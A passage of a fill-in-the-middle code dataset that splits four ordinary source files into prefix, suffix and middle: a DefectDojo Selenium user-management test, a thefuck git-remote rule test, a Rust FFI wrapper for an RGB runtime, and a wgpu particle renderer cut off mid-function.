file_name (stringlengths 3-137) | prefix (stringlengths 0-918k) | suffix (stringlengths 0-962k) | middle (stringlengths 0-812k)
---|---|---|---|
user_test.py | import time
import unittest
import sys
from pathlib import Path
from base_test_class import BaseTestCase
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver import ActionChains
class UserTest(BaseTestCase):
@staticmethod
def add_user_read_only_parameter():
f = open('dojo/settings/local_settings.py', 'w')
f.write("USER_PROFILE_EDITABLE=False")
f.close()
@staticmethod
def unset_user_read_only_parameter():
f = open('dojo/settings/local_settings.py', 'w')
f.write("USER_PROFILE_EDITABLE=True")
f.close()
@staticmethod
def reload_service():
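# Touching settings.py should make the auto-reloading server pick up the new local_settings value (assumption about the test environment).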
Path("dojo/settings/settings.py").touch()
def test_create_user(self):
# Login to the site.
driver = self.driver
# Navigate to the User management page
driver.get(self.base_url + "user")
# "Click" the dropdown button to see options
driver.find_element(By.ID, "dropdownMenu1").click()
# "Click" the add prodcut button
driver.find_element(By.LINK_TEXT, "New User").click()
# Fill in the Necessary User Details
# username, first name, last name, email, and permissions
# Don't forget to clear before inserting
# username
driver.find_element(By.ID, "id_username").clear()
driver.find_element(By.ID, "id_username").send_keys("propersahm")
# password
driver.find_element(By.ID, "id_password").clear()
driver.find_element(By.ID, "id_password").send_keys("Def3ctD0jo&")
# First Name
driver.find_element(By.ID, "id_first_name").clear()
driver.find_element(By.ID, "id_first_name").send_keys("Proper")
# Last Name
driver.find_element(By.ID, "id_last_name").clear()
driver.find_element(By.ID, "id_last_name").send_keys("Samuel")
# Email Address
driver.find_element(By.ID, "id_email").clear()
driver.find_element(By.ID, "id_email").send_keys("[email protected]")
# "Click" the submit button to complete the transaction
driver.find_element(By.CSS_SELECTOR, "input.btn.btn-primary").click()
# Query the site to determine if the user has been created
# Assert on the query to determine success or failure
self.assertTrue(self.is_success_message_present(text='User added successfully.') or
self.is_help_message_present(text='A user with that username already exists.'))
def login_standard_page(self):
driver = self.driver
driver.get(self.base_url + "login")
driver.find_element(By.ID, "id_username").clear()
driver.find_element(By.ID, "id_username").send_keys('propersahm')
driver.find_element(By.ID, "id_password").clear()
driver.find_element(By.ID, "id_password").send_keys('Def3ctD0jo&')
driver.find_element(By.CSS_SELECTOR, "button.btn.btn-success").click()
self.assertFalse(self.is_element_by_css_selector_present('.alert-danger', 'Please enter a correct username and password'))
return driver
def test_user_edit_permissions(self):
# Login to the site. Password will have to be modified
# to match an admin password in your own container
driver = self.driver
# Navigate to User Management page
driver.get(self.base_url + "user")
# Select the previously created user to edit
# The user name is not clickable,
# so we have to select the specific user by filtering the list of users
driver.find_element(By.ID, "show-filters").click() # open the filters
# Insert username to filter by into user name box
driver.find_element(By.ID, "id_username").clear()
driver.find_element(By.ID, "id_username").send_keys("propersahm")
# click on 'apply filter' button
driver.find_element(By.CSS_SELECTOR, "button.btn.btn-sm.btn-secondary").click()
# only the needed user is now available; proceed with opening the context menu and clicking the 'Edit' button
driver.find_element(By.ID, "dropdownMenuUser").click()
driver.find_element(By.ID, "editUser").click()
# Select Superuser and Staff Permission
driver.find_element(By.NAME, "is_superuser").click()
driver.find_element(By.NAME, "is_staff").click()
# "Click" the submit button to complete the transaction
driver.find_element(By.CSS_SELECTOR, "input.btn.btn-primary").click()
# Query the site to determine if the User permission has been changed
# Assert on the query to determine success or failure
self.assertTrue(self.is_success_message_present(text='User saved successfully.'))
def test_user_delete(self):
# Login to the site. Password will have to be modified
# to match an admin password in your own container
driver = self.driver
# Navigate to the User management page
driver.get(self.base_url + "user")
# Select a user to edit
# The user name is not clickable,
# so we have to select the specific user by filtering the list of users
driver.find_element(By.ID, "show-filters").click() # open the filters
# Insert username to filter by into user name box
driver.find_element(By.ID, "id_username").clear()
driver.find_element(By.ID, "id_username").send_keys("propersahm")
# click on 'apply filter' button
driver.find_element(By.CSS_SELECTOR, "button.btn.btn-sm.btn-secondary").click()
# only the needed user is now available; proceed with clicking the 'View' button
driver.find_element(By.ID, "dropdownMenuUser").click()
driver.find_element(By.ID, "viewUser").click()
# in View User dialog open the menu to click the delete entry
driver.find_element(By.ID, "dropdownMenu1").click()
driver.find_element(By.ID, "deleteUser").click()
# confirm deletion by clicking delete a second time
driver.find_element(By.CSS_SELECTOR, "button.btn.btn-danger").click()
# Query the site to determine if the User has been deleted
# Assert on the query to determine success or failure
self.assertTrue(self.is_success_message_present(text='User and relationships removed.'))
def test_user_notifications_change(self):
# Login to the site. Password will have to be modified
# to match an admin password in your own container
driver = self.driver
wait = WebDriverWait(driver, 5)
actions = ActionChains(driver)
configuration_menu = driver.find_element(By.ID, 'menu_configuration')
actions.move_to_element(configuration_menu).perform()
wait.until(EC.visibility_of_element_located((By.LINK_TEXT, "Notifications"))).click()
originally_selected = {
'product_added': driver.find_element(By.XPATH, "//input[@name='product_added' and @value='mail']").is_selected(),
'scan_added': driver.find_element(By.XPATH, "//input[@name='scan_added' and @value='mail']").is_selected()
}
driver.find_element(By.XPATH, "//input[@name='product_added' and @value='mail']").click()
driver.find_element(By.XPATH, "//input[@name='scan_added' and @value='mail']").click()
driver.find_element(By.CSS_SELECTOR, "input.btn.btn-primary").click()
self.assertTrue(self.is_success_message_present(text='Settings saved'))
self.assertNotEqual(originally_selected['product_added'],
driver.find_element(By.XPATH, "//input[@name='product_added' and @value='mail']").is_selected())
self.assertNotEqual(originally_selected['scan_added'],
driver.find_element(By.XPATH, "//input[@name='scan_added' and @value='mail']").is_selected())
def test_standard_user_login(self):
|
def test_admin_profile_form(self):
self.add_user_read_only_parameter()
self.reload_service()
self.driver.get(self.base_url + "profile")
self.assertTrue(self.driver.find_element(By.ID, 'id_first_name').is_enabled())
def test_user_profile_form_disabled(self):
self.driver.get(self.base_url + "profile")
self.assertFalse(self.driver.find_element(By.ID, 'id_first_name').is_enabled())
def test_user_profile_form_enabled(self):
self.unset_user_read_only_parameter()
# Do not call reload_service() here, to avoid reloading twice
time.sleep(5)
self.driver.get(self.base_url + "profile")
self.assertTrue(self.driver.find_element(By.ID, 'id_first_name').is_enabled())
def test_forgot_password(self):
driver = self.driver
driver.get(self.base_url + "login")
# Click on link on login screen
driver.find_element_by_id("reset-password").click()
# Submit "Forgot password" form
driver.find_element_by_id("id_email").send_keys("[email protected]")
driver.find_element_by_id("reset-password").click()
self.assertTrue(self.is_text_present_on_page(text='We’ve emailed you instructions for setting your password'))
def suite():
suite = unittest.TestSuite()
# Add each test to the suite to be run
# success and failure are output by the test
suite.addTest(BaseTestCase('test_login'))
suite.addTest(UserTest('test_create_user'))
suite.addTest(UserTest('test_admin_profile_form'))
suite.addTest(BaseTestCase('test_logout'))
suite.addTest(UserTest('test_standard_user_login'))
suite.addTest(UserTest('test_user_profile_form_disabled'))
suite.addTest(UserTest('test_user_profile_form_enabled'))
suite.addTest(BaseTestCase('test_logout'))
suite.addTest(UserTest('test_forgot_password'))
suite.addTest(BaseTestCase('test_login'))
suite.addTest(UserTest('test_user_edit_permissions'))
suite.addTest(UserTest('test_user_delete'))
# not really for the user we created, but still related to user settings
suite.addTest(UserTest('test_user_notifications_change'))
return suite
if __name__ == "__main__":
runner = unittest.TextTestRunner(descriptions=True, failfast=True, verbosity=2)
ret = not runner.run(suite()).wasSuccessful()
BaseTestCase.tearDownDriver()
sys.exit(ret)
| self.login_standard_page() |
test_git_remote_seturl_add.py | import pytest
from thefuck.rules.git_remote_seturl_add import match, get_new_command
from thefuck.types import Command
@pytest.mark.parametrize('command', [
Command('git remote set-url origin url', "fatal: No such remote")])
def test_match(command):
assert match(command)
@pytest.mark.parametrize('command', [
Command('git remote set-url origin url', ""),
Command('git remote add origin url', ''),
Command('git remote remove origin', ''),
Command('git remote prune origin', ''),
Command('git remote set-branches origin branch', '')])
def test_not_match(command):
|
@pytest.mark.parametrize('command, new_command', [
(Command('git remote set-url origin [email protected]:nvbn/thefuck.git', ''),
'git remote add origin [email protected]:nvbn/thefuck.git')])
def test_get_new_command(command, new_command):
assert get_new_command(command) == new_command
| assert not match(command) |
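For reference, a minimal sketch of a rule that would satisfy the assertions above, assuming Command exposes the script and output attributes used in its two-argument constructor; the real thefuck rule (and its git_support decorator) may differ:

# Hypothetical reconstruction for illustration only; see thefuck's actual
# git_remote_seturl_add rule for the real implementation.
def match(command):
    # Fire only when `git remote set-url` failed because the remote does not exist yet.
    return ('set-url' in command.script
            and 'fatal: No such remote' in command.output)

def get_new_command(command):
    # Re-run the same command with `add` instead of `set-url`.
    return command.script.replace('set-url', 'add')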
lib.rs | use std::any::TypeId;
use std::collections::hash_map::DefaultHasher;
use std::collections::HashMap;
use std::env;
use std::ffi::{CStr, CString};
use std::hash::{Hash, Hasher};
use std::os::raw::{c_char, c_void};
use log::{info, LevelFilter};
use serde::Deserialize;
use rgb::lnpbp::bitcoin::OutPoint;
use rgb::lnpbp::bp;
use rgb::lnpbp::lnp::transport::zmq::{SocketLocator, UrlError};
use rgb::lnpbp::rgb::{seal, Amount};
use rgb::fungible::{Invoice, IssueStructure, Outcoins};
use rgb::i9n::*;
use rgb::rgbd::ContractName;
use rgb::util::SealSpec;
trait CReturnType: Sized + 'static {
fn from_opaque(other: &COpaqueStruct) -> Result<&mut Self, String> {
let mut hasher = DefaultHasher::new();
TypeId::of::<Self>().hash(&mut hasher);
let ty = hasher.finish();
if other.ty != ty {
return Err(String::from("Type mismatch"));
}
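// Reborrow the caller-owned pointer: Box::from_raw followed by Box::leak yields a
// &mut Self without dropping the value, so the pointer held on the other side of
// the FFI boundary stays valid.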
let boxed = unsafe { Box::from_raw(other.ptr.clone() as *mut Self) };
Ok(Box::leak(boxed))
}
}
impl CReturnType for Runtime {}
impl CReturnType for String {}
impl CReturnType for () {}
#[repr(C)]
pub struct COpaqueStruct {
ptr: *const c_void,
ty: u64,
}
impl COpaqueStruct {
fn new<T: 'static>(other: T) -> Self {
let mut hasher = DefaultHasher::new();
TypeId::of::<T>().hash(&mut hasher);
let ty = hasher.finish();
COpaqueStruct {
ptr: Box::into_raw(Box::new(other)) as *const c_void,
ty,
}
}
fn raw<T>(ptr: *const T) -> Self {
COpaqueStruct {
ptr: ptr as *const c_void,
ty: 0,
}
}
}
#[repr(C)]
pub struct CErrorDetails {
message: *const c_char,
}
fn string_to_ptr(other: String) -> *const c_char {
let cstr = match CString::new(other) {
Ok(cstr) => cstr,
Err(_) => CString::new(String::from(
"Error converting string: contains a null-char",
))
.unwrap(),
};
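// into_raw transfers ownership of the CString to the caller; the foreign side is
// responsible for eventually releasing it.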
cstr.into_raw()
}
fn ptr_to_string(ptr: *mut c_char) -> Result<String, String> {
unsafe {
CStr::from_ptr(ptr)
.to_str()
.map(|s| s.into())
.map_err(|e| format!("{:?}", e))
}
}
#[repr(C)]
pub enum CResultValue {
Ok,
Err,
}
#[repr(C)]
pub struct CResult {
result: CResultValue,
inner: COpaqueStruct,
}
impl<T: 'static, E> From<Result<T, E>> for CResult
where
E: std::fmt::Debug,
{
fn from(other: Result<T, E>) -> Self {
match other {
Ok(d) => CResult {
result: CResultValue::Ok,
inner: COpaqueStruct::new(d),
},
Err(e) => CResult {
result: CResultValue::Err,
inner: COpaqueStruct::raw(string_to_ptr(format!("{:?}", e))),
},
}
}
}
#[derive(Debug, Deserialize)]
struct StartRgbArgs {
#[serde(with = "serde_with::rust::display_fromstr")]
network: bp::Network,
#[serde(with = "serde_with::rust::display_fromstr")]
stash_endpoint: SocketLocator,
contract_endpoints: HashMap<ContractName, String>,
threaded: bool,
datadir: String,
}
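// Illustrative JSON accepted by start_rgb; the field values below are made-up
// examples (not taken from the source) and the endpoint/contract-name formats
// depend on how SocketLocator and ContractName parse from strings:
// {"network":"testnet","stash_endpoint":"ipc:/tmp/stash.rpc",
//  "contract_endpoints":{"Fungible":"ipc:/tmp/fungible.rpc"},
//  "threaded":true,"datadir":"/tmp/rgb"}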
fn _start_rgb(json: *mut c_char) -> Result<Runtime, String> {
let config: StartRgbArgs =
serde_json::from_str(ptr_to_string(json)?.as_str()).map_err(|e| format!("{:?}", e))?;
info!("Config: {:?}", config);
let config = Config {
network: config.network,
stash_endpoint: config.stash_endpoint,
threaded: config.threaded,
data_dir: config.datadir,
contract_endpoints: config
.contract_endpoints
.into_iter()
.map(|(k, v)| -> Result<_, UrlError> { Ok((k, v.parse()?)) })
.collect::<Result<_, _>>()
.map_err(|e| format!("{:?}", e))?,
};
Runtime::init(config).map_err(|e| format!("{:?}", e))
}
#[cfg(target_os = "android")]
fn start_logger() |
#[cfg(not(target_os = "android"))]
fn start_logger() {
env::set_var("RUST_LOG", "trace");
::env_logger::init();
log::set_max_level(LevelFilter::Trace);
}
#[no_mangle]
pub extern "C" fn start_rgb(json: *mut c_char) -> CResult {
start_logger();
info!("Starting RGB...");
_start_rgb(json).into()
}
#[derive(Debug, Deserialize)]
struct IssueArgs {
#[serde(with = "serde_with::rust::display_fromstr")]
network: bp::Network,
ticker: String,
name: String,
#[serde(default)]
description: Option<String>,
issue_structure: IssueStructure,
#[serde(default)]
allocations: Vec<Outcoins>,
precision: u8,
#[serde(default)]
prune_seals: Vec<SealSpec>,
#[serde(default)]
dust_limit: Option<Amount>,
}
fn _issue(runtime: &COpaqueStruct, json: *mut c_char) -> Result<(), String> {
let runtime = Runtime::from_opaque(runtime)?;
let data: IssueArgs =
serde_json::from_str(ptr_to_string(json)?.as_str()).map_err(|e| format!("{:?}", e))?;
info!("{:?}", data);
runtime
.issue(
data.network,
data.ticker,
data.name,
data.description,
data.issue_structure,
data.allocations,
data.precision,
data.prune_seals,
data.dust_limit,
)
.map_err(|e| format!("{:?}", e))
}
#[no_mangle]
pub extern "C" fn issue(runtime: &COpaqueStruct, json: *mut c_char) -> CResult {
_issue(runtime, json).into()
}
#[derive(Debug, Deserialize)]
struct TransferArgs {
inputs: Vec<OutPoint>,
allocate: Vec<Outcoins>,
#[serde(with = "serde_with::rust::display_fromstr")]
invoice: Invoice,
prototype_psbt: String,
fee: u64,
change: Option<seal::Confidential>,
consignment_file: String,
transaction_file: String,
}
fn _transfer(runtime: &COpaqueStruct, json: *mut c_char) -> Result<(), String> {
let runtime = Runtime::from_opaque(runtime)?;
let data: TransferArgs =
serde_json::from_str(ptr_to_string(json)?.as_str()).map_err(|e| format!("{:?}", e))?;
info!("{:?}", data);
runtime
.transfer(
data.inputs,
data.allocate,
data.invoice,
data.prototype_psbt,
data.fee,
data.change,
data.consignment_file,
data.transaction_file,
)
.map_err(|e| format!("{:?}", e))
.map(|_| ())
//.and_then(|r| serde_json::to_string(&r).map_err(|e| format!("{:?}", e)))
}
#[no_mangle]
pub extern "C" fn transfer(runtime: &COpaqueStruct, json: *mut c_char) -> CResult {
_transfer(runtime, json).into()
}
| {
android_logger::init_once(android_logger::Config::default().with_min_level(log::Level::Debug));
} |
main.rs | use image::{self, DynamicImage, GenericImageView};
use pollster::FutureExt;
use rand::{
distributions::{Distribution, Uniform},
SeedableRng,
};
use std::mem;
use wgpu::util::DeviceExt;
use winit::{
dpi::PhysicalSize,
event::*,
event_loop::{ControlFlow, EventLoop},
window::{Window, WindowBuilder},
};
const PARTICLES_PER_GROUP: u32 = 64;
const DOT_SIZE: f32 = 0.005;
const NUM_PARTICLES: u32 = 16384;
const Q_CHARGE: f32 = 0.05;
const BLANK_LEVEL: f32 = 0.95;
const TIME_DELTA: f32 = 0.001;
const D_MAX: f32 = 0.005;
const SUSTAIN: f32 = 0.95;
struct Model {
surface: wgpu::Surface,
device: wgpu::Device,
queue: wgpu::Queue,
particle_bind_groups: Vec<wgpu::BindGroup>,
particle_buffers: Vec<wgpu::Buffer>,
vertices_buffer: wgpu::Buffer,
texture_bind_group: wgpu::BindGroup,
compute_pipeline: wgpu::ComputePipeline,
render_pipeline: wgpu::RenderPipeline,
parameter_bind_group_layout: wgpu::BindGroupLayout,
work_group_count: u32,
texture_size: wgpu::Extent3d,
frames: Vec<Vec<u8>>,
frame_num: usize,
}
impl Model {
async fn new(window: &Window) -> Self {
let size = window.inner_size();
let instance = wgpu::Instance::new(wgpu::Backends::all());
let surface = unsafe { instance.create_surface(window) };
let adapter = instance
.request_adapter(&wgpu::RequestAdapterOptions {
power_preference: wgpu::PowerPreference::default(),
compatible_surface: Some(&surface),
force_fallback_adapter: false,
})
.await
.unwrap();
let (device, queue) = adapter
.request_device(
&wgpu::DeviceDescriptor {
label: None,
features: wgpu::Features::empty(),
limits: wgpu::Limits::default(),
},
None,
)
.await
.unwrap();
let config = wgpu::SurfaceConfiguration {
usage: wgpu::TextureUsages::RENDER_ATTACHMENT,
format: surface.get_preferred_format(&adapter).unwrap(),
width: size.width,
height: size.height,
present_mode: wgpu::PresentMode::Fifo,
};
surface.configure(&device, &config);
let work_group_count =
((NUM_PARTICLES as f32) / (PARTICLES_PER_GROUP as f32)).ceil() as u32;
let draw_shader = device.create_shader_module(&wgpu::include_wgsl!("draw.wgsl"));
let gray_scale_shader = device.create_shader_module(&wgpu::include_wgsl!("grayscale.wgsl"));
let cache_shader = device.create_shader_module(&wgpu::include_wgsl!("cache.wgsl"));
let compute_shader = device.create_shader_module(&wgpu::include_wgsl!("compute.wgsl"));
let img_bytes = include_bytes!("../assets/cat_3_square.png");
let img = image::load_from_memory(img_bytes).unwrap();
let (w, h) = img.dimensions();
let texture_size = wgpu::Extent3d {
width: w,
height: h,
depth_or_array_layers: 1,
};
let gray_texture =
create_gray_texture(&device, &queue, &img, &gray_scale_shader, texture_size);
let cache_texture =
create_cache_texture(&device, &queue, &gray_texture, &cache_shader, texture_size);
let img_bytes2 = include_bytes!("../assets/cat_face.png");
let img2 = image::load_from_memory(img_bytes2).unwrap();
let (w, h) = img2.dimensions();
let texture_size2 = wgpu::Extent3d {
width: w,
height: h,
depth_or_array_layers: 1,
};
let gray_texture2 =
create_gray_texture(&device, &queue, &img2, &gray_scale_shader, texture_size2);
let cache_texture2 = create_cache_texture(
&device,
&queue,
&gray_texture2,
&cache_shader,
texture_size2,
);
let param_data = create_param_data(0.0);
let parameter_bind_group_layout =
create_parameter_bind_group_layout(&device, param_data.len());
let texture_bind_group_layout =
device.create_bind_group_layout(&wgpu::BindGroupLayoutDescriptor {
entries: &[
wgpu::BindGroupLayoutEntry {
binding: 0,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Texture {
multisampled: false,
view_dimension: wgpu::TextureViewDimension::D2,
sample_type: wgpu::TextureSampleType::Float { filterable: false },
},
count: None,
},
wgpu::BindGroupLayoutEntry {
binding: 1,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Texture {
multisampled: false,
view_dimension: wgpu::TextureViewDimension::D2,
sample_type: wgpu::TextureSampleType::Float { filterable: false },
},
count: None,
},
],
label: Some("texture bind group layout"),
});
let texture_bind_group = device.create_bind_group(&wgpu::BindGroupDescriptor {
layout: &texture_bind_group_layout,
entries: &[
wgpu::BindGroupEntry {
binding: 0,
resource: wgpu::BindingResource::TextureView(
&cache_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
wgpu::BindGroupEntry {
binding: 1,
resource: wgpu::BindingResource::TextureView(
&cache_texture2.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
],
label: Some("texture bind group"),
});
let compute_bind_group_layout = create_compute_bind_group_layout(&device);
let compute_pipeline_layout = create_compute_pipeline_layout(
&device,
¶meter_bind_group_layout,
&compute_bind_group_layout,
&texture_bind_group_layout,
);
let compute_pipeline =
create_compute_pipeline(&device, &compute_pipeline_layout, &compute_shader);
let render_pipeline_layout = create_render_pipeline_layout(&device);
let render_pipeline =
create_render_pipeline(&device, &draw_shader, &config, &render_pipeline_layout);
let vertices_buffer = create_vertices_buffer(&device);
let particle_buffers = create_particle_buffers(&device);
let particle_bind_groups =
create_particle_bind_groups(&device, &compute_bind_group_layout, &particle_buffers);
let frames = Vec::new();
Model {
surface,
device,
queue,
particle_bind_groups,
particle_buffers,
vertices_buffer,
texture_bind_group,
compute_pipeline,
render_pipeline,
parameter_bind_group_layout,
work_group_count,
texture_size,
frames,
frame_num: 0,
}
}
fn input(&mut self, _: &WindowEvent) -> bool {
false
}
fn update(&mut self) {}
fn render_frame(&mut self) -> anyhow::Result<()> {
let mut command_encoder = self
.device
.create_command_encoder(&wgpu::CommandEncoderDescriptor { label: None });
let target_texture = self.device.create_texture(&wgpu::TextureDescriptor {
size: self.texture_size,
mip_level_count: 1,
sample_count: 1,
dimension: wgpu::TextureDimension::D2,
format: wgpu::TextureFormat::Bgra8UnormSrgb,
usage: wgpu::TextureUsages::COPY_SRC | wgpu::TextureUsages::RENDER_ATTACHMENT,
label: None,
});
let color_attachments = [wgpu::RenderPassColorAttachment {
view: &target_texture.create_view(&wgpu::TextureViewDescriptor::default()),
resolve_target: None,
ops: wgpu::Operations {
load: wgpu::LoadOp::Clear(wgpu::Color {
r: 1.0,
g: 1.0,
b: 1.0,
a: 1.0,
}),
store: true,
},
}];
let render_pass_descriptor = wgpu::RenderPassDescriptor {
label: None,
color_attachments: &color_attachments,
depth_stencil_attachment: None,
};
{
let mut render_pass = command_encoder.begin_render_pass(&render_pass_descriptor);
render_pass.set_pipeline(&self.render_pipeline);
render_pass
.set_vertex_buffer(0, self.particle_buffers[(self.frame_num + 1) % 2].slice(..));
render_pass.set_vertex_buffer(1, self.vertices_buffer.slice(..));
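// 24 vertices = 8 triangles per particle dot (see create_vertices_buffer); one instance per particle.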
render_pass.draw(0..24, 0..NUM_PARTICLES);
}
let padded_bytes_per_row = padded_bytes_per_row(self.texture_size.width);
let unpadded_bytes_per_row = self.texture_size.width as usize * 4;
let output_buffer_size = padded_bytes_per_row as u64
* self.texture_size.height as u64
* std::mem::size_of::<u8>() as u64;
let output_buffer = self.device.create_buffer(&wgpu::BufferDescriptor {
label: None,
size: output_buffer_size,
usage: wgpu::BufferUsages::COPY_DST | wgpu::BufferUsages::MAP_READ,
mapped_at_creation: false,
});
command_encoder.copy_texture_to_buffer(
wgpu::ImageCopyTexture {
aspect: wgpu::TextureAspect::All,
texture: &target_texture,
mip_level: 0,
origin: wgpu::Origin3d::ZERO,
},
wgpu::ImageCopyBuffer {
buffer: &output_buffer,
layout: wgpu::ImageDataLayout {
offset: 0,
bytes_per_row: std::num::NonZeroU32::new(padded_bytes_per_row as u32),
rows_per_image: std::num::NonZeroU32::new(self.texture_size.height),
},
},
self.texture_size,
);
self.queue.submit(Some(command_encoder.finish()));
let buffer_slice = output_buffer.slice(..);
let mapping = buffer_slice.map_async(wgpu::MapMode::Read);
self.device.poll(wgpu::Maintain::Wait);
mapping.block_on().unwrap();
let padded_data = buffer_slice.get_mapped_range();
let data = padded_data
.chunks(padded_bytes_per_row as _)
.map(|chunk| &chunk[..unpadded_bytes_per_row as _])
.flatten()
.map(|x| *x)
.collect::<Vec<_>>();
drop(padded_data);
output_buffer.unmap();
self.frames.push(data);
Ok(())
}
fn render(&mut self) -> Result<(), wgpu::SurfaceError> {
let parameter_data = create_param_data(self.frame_num as f32);
let parameter_buffer = create_parameter_buffer(&self.device, ¶meter_data);
let parameter_bind_group = create_parameter_bind_group(
&self.device,
&self.parameter_bind_group_layout,
¶meter_buffer,
);
let mut command_encoder = self
.device
.create_command_encoder(&wgpu::CommandEncoderDescriptor { label: None });
{
let mut compute_pass =
command_encoder.begin_compute_pass(&wgpu::ComputePassDescriptor { label: None });
compute_pass.set_pipeline(&self.compute_pipeline);
compute_pass.set_bind_group(0, ¶meter_bind_group, &[]);
compute_pass.set_bind_group(1, &self.particle_bind_groups[self.frame_num % 2], &[]);
compute_pass.set_bind_group(2, &self.texture_bind_group, &[]);
compute_pass.dispatch(self.work_group_count, 1, 1);
}
let frame = self.surface.get_current_texture()?;
let view = frame
.texture
.create_view(&wgpu::TextureViewDescriptor::default());
let color_attachments = [wgpu::RenderPassColorAttachment {
view: &view,
resolve_target: None,
ops: wgpu::Operations {
load: wgpu::LoadOp::Clear(wgpu::Color {
r: 1.0,
g: 1.0,
b: 1.0,
a: 1.0,
}),
store: true,
},
}];
let render_pass_descriptor = wgpu::RenderPassDescriptor {
label: None,
color_attachments: &color_attachments,
depth_stencil_attachment: None,
};
{
let mut render_pass = command_encoder.begin_render_pass(&render_pass_descriptor);
render_pass.set_pipeline(&self.render_pipeline);
render_pass
.set_vertex_buffer(0, self.particle_buffers[(self.frame_num + 1) % 2].slice(..));
render_pass.set_vertex_buffer(1, self.vertices_buffer.slice(..));
render_pass.draw(0..24, 0..NUM_PARTICLES);
}
self.queue.submit(Some(command_encoder.finish()));
frame.present();
if self.frame_num % 6 == 0 {
self.render_frame().unwrap();
}
self.frame_num += 1;
if self.frame_num == 270 {
println!("saving...");
save_gif(
"output.gif",
&mut self.frames,
1,
self.texture_size.width as u16,
)
.unwrap();
println!("saved!!!");
}
Ok(())
}
}
fn | () {
env_logger::init();
let event_loop = EventLoop::new();
let window = WindowBuilder::new()
.with_inner_size(PhysicalSize::new(1800.0, 1800.0))
.build(&event_loop)
.unwrap();
let mut model: Model = pollster::block_on(Model::new(&window));
event_loop.run(move |event, _, control_flow| match event {
Event::WindowEvent {
ref event,
window_id,
} if window_id == window.id() => {
if !model.input(event) {
match event {
WindowEvent::CloseRequested
| WindowEvent::KeyboardInput {
input:
KeyboardInput {
state: ElementState::Pressed,
virtual_keycode: Some(VirtualKeyCode::Escape),
..
},
..
} => *control_flow = ControlFlow::Exit,
_ => {}
}
}
}
Event::RedrawRequested(_) => {
model.update();
match model.render() {
Ok(_) => {}
Err(wgpu::SurfaceError::OutOfMemory) => *control_flow = ControlFlow::Exit,
Err(e) => eprintln!("{:?}", e),
}
}
Event::RedrawEventsCleared => {
window.request_redraw();
}
_ => {}
});
}
fn create_param_data(frame_count: f32) -> Vec<f32> {
let dt = TIME_DELTA;
let dt_2 = 0.5 * dt;
let dtt = dt * dt;
let v_max = D_MAX / dt;
let pi = std::f32::consts::PI;
return vec![
Q_CHARGE,
BLANK_LEVEL,
TIME_DELTA,
D_MAX,
SUSTAIN,
dt,
dt_2,
dtt,
v_max,
frame_count,
pi,
];
}
fn create_parameter_bind_group_layout(
device: &wgpu::Device,
parameter_size: usize,
) -> wgpu::BindGroupLayout {
device.create_bind_group_layout(&wgpu::BindGroupLayoutDescriptor {
entries: &[wgpu::BindGroupLayoutEntry {
binding: 0,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Buffer {
ty: wgpu::BufferBindingType::Uniform,
has_dynamic_offset: false,
min_binding_size: wgpu::BufferSize::new(
(parameter_size * mem::size_of::<f32>()) as _,
),
},
count: None,
}],
label: None,
})
}
fn create_compute_bind_group_layout(device: &wgpu::Device) -> wgpu::BindGroupLayout {
device.create_bind_group_layout(&wgpu::BindGroupLayoutDescriptor {
entries: &[
wgpu::BindGroupLayoutEntry {
binding: 0,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Buffer {
ty: wgpu::BufferBindingType::Storage { read_only: true },
has_dynamic_offset: false,
min_binding_size: wgpu::BufferSize::new((NUM_PARTICLES * 16) as _),
},
count: None,
},
wgpu::BindGroupLayoutEntry {
binding: 1,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Buffer {
ty: wgpu::BufferBindingType::Storage { read_only: false },
has_dynamic_offset: false,
min_binding_size: wgpu::BufferSize::new((NUM_PARTICLES * 16) as _),
},
count: None,
},
],
label: None,
})
}
fn create_compute_pipeline_layout(
device: &wgpu::Device,
parameter_bind_group_layout: &wgpu::BindGroupLayout,
compute_bind_group_layout: &wgpu::BindGroupLayout,
texture_bind_group_layout: &wgpu::BindGroupLayout,
) -> wgpu::PipelineLayout {
device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor {
label: Some("compute"),
bind_group_layouts: &[
parameter_bind_group_layout,
compute_bind_group_layout,
texture_bind_group_layout,
],
push_constant_ranges: &[],
})
}
fn create_compute_pipeline(
device: &wgpu::Device,
compute_pipeline_layout: &wgpu::PipelineLayout,
compute_shader: &wgpu::ShaderModule,
) -> wgpu::ComputePipeline {
device.create_compute_pipeline(&wgpu::ComputePipelineDescriptor {
label: Some("Compute Pipeline"),
layout: Some(&compute_pipeline_layout),
module: compute_shader,
entry_point: "main",
})
}
fn create_render_pipeline_layout(device: &wgpu::Device) -> wgpu::PipelineLayout {
device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor {
label: Some("render"),
bind_group_layouts: &[],
push_constant_ranges: &[],
})
}
fn create_render_pipeline(
device: &wgpu::Device,
draw_shader: &wgpu::ShaderModule,
config: &wgpu::SurfaceConfiguration,
render_pipeline_layout: &wgpu::PipelineLayout,
) -> wgpu::RenderPipeline {
device.create_render_pipeline(&wgpu::RenderPipelineDescriptor {
label: None,
layout: Some(&render_pipeline_layout),
vertex: wgpu::VertexState {
module: &draw_shader,
entry_point: "main_vs",
buffers: &[
wgpu::VertexBufferLayout {
array_stride: 6 * 4,
step_mode: wgpu::VertexStepMode::Instance,
attributes: &wgpu::vertex_attr_array![0 => Float32x2, 1 => Float32x2, 2 => Float32x2],
},
wgpu::VertexBufferLayout {
array_stride: 2 * 4,
step_mode: wgpu::VertexStepMode::Vertex,
attributes: &wgpu::vertex_attr_array![3 => Float32x2],
},
],
},
fragment: Some(wgpu::FragmentState {
module: &draw_shader,
entry_point: "main_fs",
targets: &[config.format.into()],
}),
primitive: wgpu::PrimitiveState::default(),
depth_stencil: None,
multisample: wgpu::MultisampleState::default(),
multiview: None,
})
}
fn create_vertices_buffer(device: &wgpu::Device) -> wgpu::Buffer {
// 8 * 6
let mut vertex_buffer_data: [f32; 48] = [0.0; 48];
let theta = 2.0 * std::f32::consts::PI / 8.0;
for i in 0..8 {
vertex_buffer_data[6 * i] = 0.0;
